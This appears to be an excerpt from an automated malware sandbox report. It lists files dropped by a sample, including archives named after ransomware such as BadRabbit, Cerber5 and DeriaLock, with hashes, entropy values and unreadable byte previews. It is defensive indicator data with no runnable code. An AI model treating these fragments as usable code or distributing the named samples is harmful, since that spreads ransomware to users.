                                                                                                                                                Preview:PK...........CF.\.............Endermanch@Antivirus.exe.z..o_+.....#...mg...$.YW..G.pCot.s...$.....R...a..:.....c.l.?.,r.)i..I...z.0.2F.5..b.F..Y..].C...po...".....(..>G..M6."7.~..}....VCb.._.U.L...........6o...........#A.[..1.......=..}.r..=B ....o...h.z.....c..h.o[.b...v%m.K..8F..~.m...]..../.i.d.B..]..........}.....2..z.n'....y.Kqx.3:%NEg@..._%[P.l..zp.....ai"...^L|......!X.....A....{...:......%..?.y.....=.R...} Q......K..0.n.Xh#.t.\....5....[~ZdF..%.T..j.n......?a;U..XO8.k..+...Q+..7...Mg...V.\...>........4...P.B"o.M.o.jJ..?.|h...<.....V.F/i.ru..L`(1.Vv.sd,.BD{s.t..+`.s.....m.b.9eh.... .3.../..T.q.: ....PZ....:v:o....wAV..s.....C......=..+...i.j. .G.1.U..D.zH+..}.k.!......q.....D..WL......7..L... .F....'..7..!...]!.:......tm,Q.DC....&.Vg..Q.A.\.;..>.[|l:...&Z.n...C...(..J3.O.*.....0.5..~.H...q.q...f..hI.4....(.V....:..V...}..2i&.?..U.?F....d.E....-tb&.U.HE.......1t..d....d...]....f."..%..Y'rD./.....p)......{..i............1.c.5)..Q...QW.pE
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.821645869473393
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:1d9KzYA2yQ0YuK5SaploGKhxBUhwarkxjwlGDbDUI:b9CwyQ0rulbLhd+jwl7I
                                                                                                                                                MD5:0D67EFBD2693BE23CD4822549A27E8AF
                                                                                                                                                SHA1:A88AE647CBEB2471A6315806B1B27FA536DD6514
                                                                                                                                                SHA-256:6C3BF5DA407F844745544DCC9C42CBA37C93948588334AF5DA4560EAE261421D
                                                                                                                                                SHA-512:B1F79927D1E07067CF8E4424AE78FEA6F6B1EB3A27E885B613692760F66D74B65FC9FE1F493D71E8938EA7D9190E04214743323332F52DD7EB3387615A4470B4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..;...z...."/....V>Q...G.r..7.I..a.....;F.j.......;..m.....#. ....Vj..Ol.yv..#...Hp.....O.f..:.C...,f..v.z...:..o%..&.,{r..%..H..5.H}..x.../.o.0.t..K..r%...e.DO..0..0..swm.]'......X..p....K.!,.NR......p|..1........G.....~p...a..4.....~Rl..{....G......W..-....S^...^.....Q/.w. .R=1..y.yd.....C.}6...Dd.s...[.4..?...I.3p..I....Q..]...J.FD.=m....].H.b\....Vq_J.......k.E..Y...H.y.......zQ.....!$L?.Ub..6Kc..}.El/p....-...,...NE..!F...-s.b...<l>.R/c@...}..f...".....<...p..(..S..JcAOj....B.2.....8........`...%....Q..&....=Lk......FC_-.f....../....B.i#N.._\...F.......(..!q....2..._..U.WB.A.RL.u......I.~fxP.$.x..X..de..........>...l.j.I.M.Pb..Pq..IQ~.w1..l..>.d.).......&H3...'..W...T.......?L...-.1.v..}....Q.......s.}..I..K.'...KZ.m4h...JD...W..hC...Y=...Yu. ......vy~..B..}.%...Zu..>..(_$. 0Je....3..zC....f.O.v....Z.$x.......Wp...1....H..r......y..+.....(i..5.q..R.Av:...~@#...r..`gzoe.......d..My.....f`....mpo...o...<...XT.3{..M....,2...).....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.821589493818038
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:2RPSNN1o0iwt8FZleFkACy6AP06MJKnmM8VPNAIthR07a/01Jt3V0C/ggfcnW0qK:2RPStolwk7YkhE0rCE27ak3xUW0zPmSD
                                                                                                                                                MD5:4A27387C28216DB5DBD875DBCCBC3C9E
                                                                                                                                                SHA1:2DDAA3F90C02843930CBADD0557E6C545639F5D2
                                                                                                                                                SHA-256:6216EB8BEDBA12065C0B0808A35F924AE73926076122252898A0AAA684E76B3C
                                                                                                                                                SHA-512:B8818DC729EE610A1649B6321C56D7C2B282ABFEE75B872A82E1904E7999FDDAD4D414CC67EF53B2A569C8CFD5E6D2427D24E064D4225E87D6EEF101D1A79B6B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.{...S...`.*hE.I>......t"..t..k]d.<..Od`.)....@....s.~"c..+{\1.........@]...r%...*s.....]..%...;j........is..(\.9.......P..&[...m.wl...kh.(.._.T;A.*...C....59UM.{.......k..VsW.>j.3n.M.<.v...Gz..!)?...mBx3..7%r[r.........3|!..!..G...50.v....`2T.OW..H_.QO...[.....y.\..Zg...w.%..$..".,a..OJ....3.6.l.+2,...(k..qw.1....{..+|J!.Yq...<NaR....V..8...........Fs9... a.1=...i.bF4JS.u....c....}...}.....y...1 1,X.C..p.v.........t.......].;....l.WY.#.5....(@.R..z..7.w...[4..|.9.[.V7..Ur`=...;..H...8..5.g,.-`r...NRH.U6h..[T..B..X.Z_P..#.....W.m..E....Eu.......,..~..>.3E..J.....S.%. .2..!..H..fY0.A..B...... ..I.....Kw...;|.U..a...c./..).Jr.....4Y2..sTm.+#.W...p.:L.|.CY.K..(.......T...)L.{(.|R,.y......l........s...`t.m......`e..s.........C....3.h..K...Yd...........^ce(8.z.K....".O.x..._$..x..@5.....u./..../:c..fv...;...._ ........U.n.`.......s},.mSw..p:.-K[_..;V7..h.e...b..k.,^...Z..|.07....S...{...J....T.1.._.]6`..Y> O.iX;...h...(.k..(.`Y.. .YU...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.837555471766963
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:QmldKUhXyf42tYzeskLkJ+CUvF/Nkr2veHfTlfXqdlX:XdA4hSCUvbkCWpfXqzX
                                                                                                                                                MD5:2EE2495BEAFFFCB6314E530FB8A4FD0E
                                                                                                                                                SHA1:4E5490CA8C7A8F50D7FE39B7E4ED01250110FC39
                                                                                                                                                SHA-256:C0D6F46EBB390B84B489CB23C30BEE8F4BB47A76E54B855F3F4C6535EDE21267
                                                                                                                                                SHA-512:9FDFC9C48578B83D1547B4127BD36C3A106A46A6D25E89CDC4F5A5EB2E683F3AD66EDC3704A28BC94D860DE93E64C5034369B788D425D0EB6A962AF26711F1ED
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:n........M..A.u.$+"t...!;&...........y...]E.d..|.t.{R.]u[m.....4P...d.r..o..J..p....d.N...c-x..X.8z..G@...Sc<.^......`..Nw..<..V..[..c...H..o.S..7.%......A...W....8..&.6^....../.ho./..5...R......R..O..9./l.u.&ka_....Z..T..2F.e.5..>\X..{.............._.|L.<...u.S.k...F.$...@{.{e~HU.!P....+.*..#q.$..d.A..a.5..MR(.c..Cpd'.0vJ;......U..7.|.p.!.C..x>,!.j>....zt.-....F...].j...#V.2.G.l^..q]..0.zE.gQ..I..kI...9.o}...z..W...?r......kC...fbni.....J....;K=.R..9......-....Hk/..e.YrxD.Bk"....9..".9.......).Z)...M....te.9......\..{D...s.{......&..4-.niP2.[rQ...j..x.......{.&..5......*O...........v\SU....3I`r...5.....9........7..!V.R......`....b<...g..........T.1;...Ug.......p...(...`...E.HC..V....+...F7.2--....5..CI..?..#x.~N..t...2....h.....=..A.a.+.d.......=>q.Szh..f...%7....06.....(..w.U8...?.z.=S....\.2Wc].`iy......b..^K..t..&x&.V...7..8;.C....s.q..^.+.q.8Xak..=.......plh....hp.}..".q.B^l,../...^!....W....Z.B.....2i.G.O.cn.Q.....r.....p0<Wr..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.823897413194036
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:NXgH02ACoz6dgzj83gsD78hXc0/m5Lhl1XbVBT9sx2tkmA:i0X62zQgs0hzYNnbz96mA
                                                                                                                                                MD5:38ECBB2C113EFFF711BF28781CCBB4EA
                                                                                                                                                SHA1:11049D9A18BF1B5F3F74115D06D22C26A85F186C
                                                                                                                                                SHA-256:D4B85C2483B90B6823EF2E662C79608322FEEB10EF3FF332D37DC047122F0C69
                                                                                                                                                SHA-512:500989A5E2864C77D8E6077EB31DD9643C21DDEC5F8C46E2F38EC6FF1219B69486E45973EDFE20283944DCC3B5ACA2091B9532A0272C3AB2718822314768BFED
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Lj...........................y..j.]...+...>;.......U._=.....@Vs...T...2.>?..>r......`I=?v.u=l.],...{.q2b.../.....D-&. (s...o.....w].,.}...6....1!..x.....K.sSh..E.$....p.s.....6..i.6&Bn.xY8.....lJ.O*.y....X..`.w.......Vky..w.Y-?.c....p.Qh...9......IAr.Y^..t.0../.5...RI.'........GK...(..}[T._.9x.....=..]B}im.....A..[....^..C.W_.......p$b.8^..?.....y.p....w........`]*.jE.%...R.3A..........R.......g.Y. U..>n.?.K.R..........D\w..."S..;S=[......HVH.<F...ta...U..q..!|...N.zL~.....C-..W0.......Kr.j.GU.a..H..b.>I...Gi..h.U.=...7y.}..f.5bQ.r.[.l!..3.......l.H..z..9..~..2uAvo1.;\T..I.}..N./e.C.6.]t,.Q........c.-.A....2......1R.....I.P...X..X.a....x..dy...)..RY..1K.....L.3..gU.J....[>..'.K.....m..X;1..+m..1.B....qQ.....)..=.P#.@..&.....^..3#.F......*.c.2.....H....:..rj..#:....`..o....%a................V.l^'..J...T..;.x.>2...|x..M......P.4Gs&..B...c.).>...].F..0d.k.3%.........q@J.:.s.q3W..'..P.2.Q..........L...o.5.(biu.e.L!..$..G.b!..Q..e..'...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.782226975759005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Mk6CUQ7HKmIcndIIHroQwvfO77i6YjGBladuh9wWV:MzrQ7HLznVrJwevHpBl/hT
                                                                                                                                                MD5:3988DC095D80AFD162CE3076C3413553
                                                                                                                                                SHA1:4BBD0D642A32344ABE65BBFFEA93BFE6AE37AB1E
                                                                                                                                                SHA-256:288A967BD6E220C8CCB5F7F52CE960B1736283853C8E6B6892CF8E6985975FC3
                                                                                                                                                SHA-512:03F1F86C45BBACC405EB8E5BD9E023E79BCBF780A7A2C5F62410143A3B9FBFA6EC6D5B892B68AC82C56AAF04B48FB08C2714CD3B09F361E67F905E6430AF170A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.b..4..=.u.....`l..o.. ..l^....k..K.d..r.O.o..A......#.. ..@..-..)U..T8......|.s....`X.....cY...8.....h[..N../'....Y.......H........h....Y.U....3<.As....i..D..+j.7.8.^..+<1....Nl=....1..T.c9.Q.w.E.K..b_..0.|\...rkLz..I.....0;..=."x..m............^Q.q8.nj.5::.F.~3./...d...`...C...:IRr/>...Q._....u.G&._=....."..q..p.....S.5..<.......v....h.~.W....;..!s...y.L.M..{.. ..w3...%...=...7...q..T....=.lT.....\.V.....!...!........r_..2.9........}.O-!..6..... .@.5..x.........!2.Lkud.G..3l.##.E.'"Q..i..."....@...G.2.'..W...y.~6.D|..\......A........Q.K..z&..?.6..<...H......X.)PI....%.&+.k.@..Q.3........4..#......`.IDG....H.\.S.u..Y.0..Rww..#......U@...ZI......#....D.$.W........<..:...`Q..w.....b!..........s.f..3..W....G....By>...,<01.8.........2.Dm....?.6qe.........b.V.=3Z....X..E.0..F.*f.2..'.`!Q...Ibj....D.P.$..h.{.9o.".IL...S._.b..f.B.M..W!V%N`..*:."......w?.o.....6..C..>.A$..^..|Z^...$...y.A.=....B}...Y....h.J8...x.}.b.xO...;b...$u...p^..... ..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.804727855327279
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:+5+fqCE63ff2rXarKpMfXijq7S3G1gLu7c6CZs2mxQ8Lx:+UfEif2rXsocXirGK67c6CZs2y
                                                                                                                                                MD5:0340553C9AD7CB2445FA85F26899C52A
                                                                                                                                                SHA1:4392DCE18A080AF5A187A4945B7922F8B1A5ADB3
                                                                                                                                                SHA-256:18812BAFA70784874AD2A5B3575397EF0156B2ABFBD9D8C9B2FE721D9EE71D10
                                                                                                                                                SHA-512:26590E252DB1328EA8B6D90DE0CE9867C369C636BF0D6110D3F8C0C1A14C28D38A3FFF429C2DEE4F10B122DD0C25A8FB0306C7CE005E24DB22A322428D1D435B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:F..6L.p......z.]?<Y^.....k..F;e..-.R"y.....APh.U...x)X0Z(M..m...I/.<..........z.;%.!.P.e.Gx..a......|.z.[.v9...5.m...&;.U...S.!.(n@1.K.....i?&h..Bv.'..... ..:..Mr.-.....^.:f..2..w.MW-^...s.8.6.E..5.v..~.g.......r..)...zd...~.3AS..L..~.F..m..J~s.....=.n+^...|T..r1..%.']....;.y.m...wP.z1. .;...Or...H..E^..>.j..._......z...$.d...^.~}.p....'..k.%X...Q...DH.x...V...d.J.*.<...H....m.l......n..EW.......)'m.>j.I...S.v.V.Y.6....&.>..1.....eB./.W.^c7d..z.z.K{hD...HwC(...z..O.....-Va^...\...Q....X.. ..E...(...FmO.%.._F.'#z?..G..N..[...8J1.G.3ihi.M........v>.r....(?...5!.z...".N.f2.(A...P=....H@.q.u... ZB../<.+HD@.GK...I.\.....f.z.,tg^n...D.{.Mf.x^.n..D...^,..4.)..w.P0..+...eH.O....9d].x.Sy.7...l*...j4.6@......."....e1....D........z..d.M......M...<....U..Y..[.9.........x....h.Z.I.:..zi ......}..o>.O........:...t...{...z....t...,..*#...z.b._:v.Yo0.......j.n.y'c.)c.I..-......m`6.a..s.n..b...2w.U.2U....M4.f...............u..........
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):402632
                                                                                                                                                Entropy (8bit):7.999545291816681
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                                                                MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                                                                SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                                                                SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                                                                SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>*k..Q./+._U.x@...SF..2...!7^F.v=.e.........*.SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.|.....:.m.~....z....7_Z.&<...&7.w.?Q.*rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf.*..62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m|..o...L...?54.P.2].$Y.......K z.....*.;Z..F.........]......k...*.4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%|.V4,_k]3
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):116134
                                                                                                                                                Entropy (8bit):7.998443688728203
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                                                                MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                                                                SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                                                                SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                                                                SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.*5!..N,).lGy.*.6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h.*..i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.*... !.W.Y.>.#?...%AO1WkK.....b.1.h.
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185620
                                                                                                                                                Entropy (8bit):7.999024397332973
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                                                                MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                                                                SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                                                                SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                                                                SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):215551
                                                                                                                                                Entropy (8bit):7.999084540418597
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                                                                MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                                                                SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                                                                SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                                                                SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.*3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..*!...C}..H..v5....|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7*.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!.*/L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):179477
                                                                                                                                                Entropy (8bit):7.998951302367822
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:5oVnkybquxcF6U/aVHOBuv7j4/rIUUT4iI5mflT9xuUqywFdiZS3e:5oV5bZxIsV4l/kz4iFh98UqywKw3e
                                                                                                                                                MD5:6D8C9D01BA5C32AEDC734087CC3D0B1B
                                                                                                                                                SHA1:F7E58E5EDD203ABC2364922B11B6641D3EE9ADD5
                                                                                                                                                SHA-256:92E885D1763E4BA1ABC92BEE9B08CA7A2AE358BDA5FE98B31A8E217327982BF7
                                                                                                                                                SHA-512:090B972E7D854DEE8C1DC45EE3035247EB8AB641C337FF8DA6DC3DBB84FA447DEEE688F760D36FDFB93CCA50D4AB27B5AB3347F75C5E4207A06E0ADA0607E3F7
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........MF..D.U...H.......Endermanch@FakeAdwCleaner.exe.cM2.N....,[Uo.a...#.M.]9(..xG.+...;.0.oT....L....8,..#..SK...n."g.N..[....[........l...F..f RI.Y.;.....L>..ob......k=...Ps.m.`$.....]5Z.F.S......\.fC.k...cp..{.`...u....:.#j.!.d.m.FV.....@X....Q.^....s7..Ml..d~9.y..A...U..J.).I..t.m.M.kg.E)....Me..`..<D=.1P."= ..2q.X...{.........)pcx.$..ZU.....$..|......k.st.E.v..r..{8.d.%..V.!.n....<B.9......?n#Z.U.........Fs..O.^ {.G.R#.]..5..Z....H@64............:+9#5P..J9......D.N.F...j..J...M.bJ$...B.B..(.&7...E....g]sC.L{].-...Th+..f..7.zI....h..k...:?B.!........C.....{....?...35v..........8..f).apaP.....*:....'.....Y.6u.>.?...6........G.s.<....j......-..tv.....H1i.Z....`....`.N .f.c0.uc.../..M ._T..I..Q..6....X..'`3..N..EdU..^....|....EM5.q...Do.....~9.toC......".ZW-...?..&P.....0....f.n.L.ti.Y.....QB....[/..-.M.7......P.....Q.)..!..A...../..OS9.gp....-.:s.$.&sv-\....S....W/~...Y@q..ada.* k6...d*...x`e...\.q.&}./,....i.9.;.,.3...1..}.Url........M"
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):203087
                                                                                                                                                Entropy (8bit):7.998965133479219
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                                                                MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                                                                SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                                                                SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                                                                SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3.*..:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB.*..S:...C.;.e.H......|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1721302
                                                                                                                                                Entropy (8bit):7.999903232734228
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:pe9rvkVDuuk8/JWXY/+XyxN7kHBRcuA7/:pedkVDuuk8/YIsy7AHE
                                                                                                                                                MD5:974918541AA75F380AA6CB4D8BD3C4BD
                                                                                                                                                SHA1:D0A6A3A301CF5330B00281EE8FF04ED9C3455FC7
                                                                                                                                                SHA-256:D703FC0DE3F07684528BC1931479815A4B9CD7B66FEDBB753CA21314A6A300D6
                                                                                                                                                SHA-512:DB829BBA3372A6E452D03D24E998EE91D28E3816C9D1A8D81330D450B24DC695E15D2612EC69729BEAFB28D95271BA55B6BE8B95DBE7F4B15F4F65BF5B5279B5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
